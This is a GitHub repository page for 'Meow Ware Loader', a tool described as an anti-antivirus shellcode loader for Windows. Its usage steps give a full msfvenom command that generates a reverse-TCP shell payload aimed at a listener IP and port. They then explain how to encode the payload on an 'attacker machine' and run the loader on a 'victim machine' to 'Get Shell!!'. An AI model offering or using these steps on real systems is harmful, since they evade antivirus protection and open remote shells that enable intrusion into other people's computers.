Skip to content

A meow meow shellcode based, anti-antivirus shell-code loader

Notifications You must be signed in to change notification settings

stevenyu113228/Meow-Ware-Loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Meow Ware Loader

About

A meow meow shellcode based, anti-antivirus shell-code loader.

Compile

Tested on gcc version 6.3.0 (MinGW.org GCC-6.3.0-1), Microsoft Windows [版本 10.0.19044.1288]

  • Converter
    • gcc converter.c -o converter.exe
  • Loader
    • gcc main.c -O3 -s -o meow_loader.exe

Usage

  1. Put the shellcode (without \x, 0x ... ) in src.txt
    • e.g. : msfvenom -p windows/shell_reverse_tcp LHOST=192.168.40.129 LPORT=9453 -f c | grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
  2. Run the converter.exe > meow.meow on the attacker machine
    • It will appear a meow.meow file contain encoded shell code
  3. Put the meow_loader.exe and meow.meow file into the victim machine in same folder
  4. Run the meow_loader.exe on the victim.
  5. Get Shell!!

Performance

Reference

About

A meow meow shellcode based, anti-antivirus shell-code loader

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages